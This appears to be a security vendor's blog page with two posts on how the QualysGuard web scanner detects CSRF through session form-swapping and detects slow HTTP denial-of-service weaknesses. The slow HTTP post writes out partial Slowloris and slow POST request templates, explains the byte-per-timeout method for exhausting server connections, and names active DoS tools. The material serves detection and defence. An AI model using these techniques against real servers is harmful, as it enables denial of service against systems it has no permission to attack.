All Posts

62 posts

Web Application Scanning & CSRF

Interest in the QualysGuard Web Application Scanning (WAS) module has been growing since its new UI was demonstrated last week at BlackHat. Along with such interest come questions about how the scanner works. The ultimate goal for WAS is to provide accurate, scalable testing for the most common, highest profile vulnerabilities (think of SQL injection and XSS) so that manual testing can skip the tedious and time-consuming aspects of an app review and focus on complex vulns that require brains rather than RAM.

One complex vuln in particular is CSRF. Automated, universal CSRF detection is a tough challenge, which is why we try to solve the problem in pieces rather than all at once. It’s the type of challenge that keeps web scanning interesting. Here’s a brief look at the approach we’ve taken to start bringing CSRF detection into the realm of automation.

First, the test assumes an authenticated scan. If the scan is not given credentials, then the tests won’t be performed. Also, tests are targeted to specific manifestations of CSRFrather than the broad set of attacks possible from our friendly sleeping giant.

Tests roughly follow these steps. Fundamentally, we’re trying to model an attack rather than make inferences based on pattern matching:

1. Identify forms with a "session context". This is a weaker version of (but hopefully a subset of) a "security context", because lots of times security requires knowledge about the boundaries within an app and the authorized actions of a user. This knowledge is hard to come by automatically. Never the less, some utility can be had by looking at forms with the following attributes:

  • Only available to an authenticated user.
  • Are not "trivial" such as search forms or logout buttons.
  • Have an observable effect, either on the session or the HTTP response. (Hint: Here’s where the automated scan becomes narrow, meaning prone to false negatives.)

2. Set up two separate sessions for the user (i.e. login twice). Keep their cookie jars apart. We’ll refer to the sessions as Aardvark and Bobcat (or A & B or Alpha & Bravo, etc.). Remember, this is for a single user.

3. Obtain a form for session Aardvark.

4. Obtain a form for session Bobcat.

5. Swap the forms between the two sessions and submit. (Crossing the streams, like Egon told you not to do.)

  • The assumption is that any CSRF tokens in Aardvark’s form are tied to the session cookie(s) used by Aardvark and Bobcat’s belong to Bobcat. Things should blow up if the tokens and session don’t match.

6. Examine the "swapped" responses.

  • If the form’s fields never change between sessions, then this is a good indicator that no CSRF token is present. You have to run tests with a browser in order to make sure there’s no JavaScript dynamically changing the form when the page loads or the form is submitted.
  • If the response has a clear indication of error, then the app is more likely to be protected from CSRF. The obvious error is something like, "Invalid CSRF token". Sadly, the world is not unicorns and rainbows for automated scanning and errors may not be so obvious or point so directly to CSRF.
  • If the response is similar to the one received from the original request, then it appears that the form is not coupled to a user’s session. This is an indicator that the form is more probably vulnerable to CSRF.

What it won’t do, because these techniques are noisy and unreliable (as opposed to subtle and quick to anger):

  • Look for hidden form fields with names or values that match CSRF tokens. If an obvious token is present, that doesn’t mean the app is actually validating it.
  • Use static inspection of the form, DOM, or HTML to look for any examples of CSRF tokens. Why look for text patterns when you’re trying to determine a behavior? Not everything is solved by regexes. (Which really is unfortunate, by the way.)
  • Attempt to evaluate the predictability of anything that looks like a CSRF token.
  • Submit forms without loading the complete page and its resources in a browser; otherwise JavaScript-based countermeasures would not be noticed.

Nor will it demonstrate the compounding factor of CSRF onother vulnerabilities like XSS. That’s something that manual pen-testing should do. In other words, WAS is focused on identifying vulns (it should find an XSS vuln, but it won’t tie the vuln to a CSRF attack to demonstrate a threat). Manual pen-testing more often focuses on how deep an app can be compromised — and the real risks associated with it.

What it’ll miss:

  • Situations where sessions cookie(s) are static or relatively static for a user. This impairs the "swap" test.
  • CSRF that can affect unauthenticated users in a meaningful way. This is vague, but as you read more about CSRF you’ll find that some people consider any forgeable action should be considered a vuln. This speaks more to the issue of evaluating risk. You should be relying on people to analyze risk, not tools.
  • CSRF that affects the user’s privacy. This requires knowledge of the app’s policy and the impact of the attack.
  • Forms whose effect on a user’s security context manifests in a different response, or in a manner that isn’t immediately evident.
  • CSRF tokens in the header, which might lead to false positives.
  • CSRF vulns that manifest via links rather thanforms. Apps put all kinds of functionality in hrefs rather than explicit form tags.
  • Other situations where we play games of anecdotes and what-ifs.

What we are trying to do:

  • Reduce noise. Don’t report vulns for the sake of reporting a vuln if no clear security context or actionable data can be provided.
  • Provide a discussion point so we can explain thebenefits of automated web scanning and point out where manual follow-up will always be necessary.
  • Learn how real-world web sites implement CSRF in order to find common behaviors that might be detectable via automation. You’d be surprised (maybe) at how often apps have security countermeasures that look nothing like OWASP recommendations and, consequently, fare rather poorly.
  • Experiment with pushing the bounds of what automation can do, while avoiding hyperbolic claims that automation solves everything.

The current state of CSRF testing in WAS should be relied on as a positive indicator (vuln found, vuln exists) more so than a negative indicator (no vuln found, no vulns exist). That’s supposed to mean that a CSRF vuln reported by WAS should not be a false positive and should be something that the app’s devs need to fix. It also means that if WAS doesn’t find a vuln then the app may still have CSRF vulns. For this particular test a clean report doesn’t mean a clean app; there’re simply too many ways of looking at the CSRF problem to tackle it all at once. We’re trying to break the problem down into manageable parts in order to understand what approaches work. We want to hear your thoughts and feedback on this.

Identifying Slow HTTP Attack Vulnerabilities on Web Applications

Slow HTTP attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an http request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.

These types of attack are easy to execute because a single machine is able to establish thousands of connections to a server and generate thousands of unfinished HTTP requests in a very short period of time using minimal bandwidth.

Due to implementation differences among various HTTP servers, two main attack vectors exist:

  • Slowloris: Slowing down HTTP headers, making the server wait for the final CRLF, which indicates the end of the headers section;
  • Slow POST: Slowing down the HTTP message body, making the server wait until all content arrives according to the Content-Length header; or until the final CRLF arrives, if HTTP 1.1 is being used and no Content-Length was declared.

The scary part is that these attacks can just look like requests that are taking a long time, so it’s hard to detect and prevent them by using traditional anti-DoS tools. Recent rumors indicate these attacks are happening right now: CIA.gov attacked using slowloris.

QualysGuard Web Application Scanner (WAS) uses a number of approaches to detect vulnerability to these attacks.

Slowloris Detection

To detect a slow headers (a.k.a. Slowloris) attack vulnerability (Qualys ID 150079), WAS opens two connections to the server and requests the base URL provided in the scan configuration.

The request sent to the first connection consists of a request line and one single header line but without the final CRLF, similar to the following:

GET / HTTP/1.1 CRLF

Connection: keep-alive CRLF

The request sent to the second connection looks identical to the first one, but WAS sends a follow-up header line some interval later to make the HTTP server think the peer is still alive:

Referer: http://www.qualys.com/products/qg_suite/was/ CRLF

Currently that interval is approximately 10 seconds plus the average response time during the crawl phase.

WAS considers the server platform vulnerable to a slowloris attack if the server closes the second connection more than 10 seconds later than the first one. In that case, the server prolonged its internal timeout value because it perceived the connection to be slow. Using a similar approach, an attacker could occupy a resource (thread or socket) on that server for virtually forever by sending a byte per T – 1 (or any random value less than T), where T is the timeout after which the server would drop the connection.

WAS does not report the server to be vulnerable if it keeps both connections open for the same long period of time (more than 2 minutes, for example), as that would be a false positive if the target server were IIS (which has protection against slow header attacks, but is less tolerant of real slow connections).

Slow POST Detection

To detect a slow POST (a.k.a. Are-You-Dead-Yet) attack vulnerability (QID 150085), WAS opens two other connections, and uses an action URL of a form it discovered during the crawl phase that doesn’t require authentication.

The request sent to the first connection looks like the following:

POST /url_that_accepts_post HTTP/1.1 CRLF

Host: host_to_test:port_if_not_default CRLF

User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0;) CRLF

Connection: close CRLF

Referer: http://www.qualys.com/products/qg_suite/was/ CRLF

Content-Type: application/x-www-form-urlencoded CRLF

Content-Length: 512 CRLF

Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 CRLF

CRLF

foo=bar

Similar to the slow headers approach, WAS sends an identical request to the second connection, and then 10 seconds later sends the following (again without the final CRLF):

alpha=beta

WAS considers the target vulnerable if any of the following conditions are met:

  • The server keeps the second connection open 10 seconds longer than the first one, or
  • The server keeps both connections open for more than 120 seconds, or
  • The server doesn’t close both connections within a 5 minute period (as WAS limits slow tests to 5 minutes only).

WAS assumes that if it is possible to either keep the connection open with an unfinished request for longer than 120 seconds or, even better, prolong the unfinished connection by sending a byte per T – 1 (or any random value less than T), then it’s possible to acquire all server sockets or threads within that interval.

WAS also performs a supplemental test to determine unhealthy behavior in handling POST requests, by sending a simple POST request to the base URI with a relatively large message body (65543 Kbytes). The content of the body is a random set of ASCII characters, and the content type is set to application/x-www-form-urlencoded. WAS assumes that if the server blindly accepts that request, e.g. responds with 200, then it gives an attacker more opportunity to prolong the slow connection by sending one byte per T – 1. Multiplying 65543 by the T – 1 would give you the length of time an attacker could keep that connection open. QID 150086 is reported on detection of that behavior.

Mitigation

Tests performed by WAS are passive and as non-intrusive as possible, which minimizes the risk of taking down the server. But because of the possibility of false positives, care should be taken, especially if the HTTP server or IPS (Intrusion Prevention System) is configured to change data processing behavior if a certain number of suspicious requests are detected.  If you are interested in active testing, which might take your server down, you can try some active testing using one of these available tools:

* slowloris

* r-u-dead-yet

* OWASP HTTP Post Tool (tests against slow headers as well)

Mitigation of slow HTTP attacks is platform specific, so it’d be nice for the community to share mitigation techniques in the comments below. I’ll post an update with information on some of those platforms, as well as general recommendations that can be extrapolated to particular platforms.

Update: Learn about New Open-Source Tool for Slow HTTP DoS Attack Vulnerabilities and download the slowhttptest tool.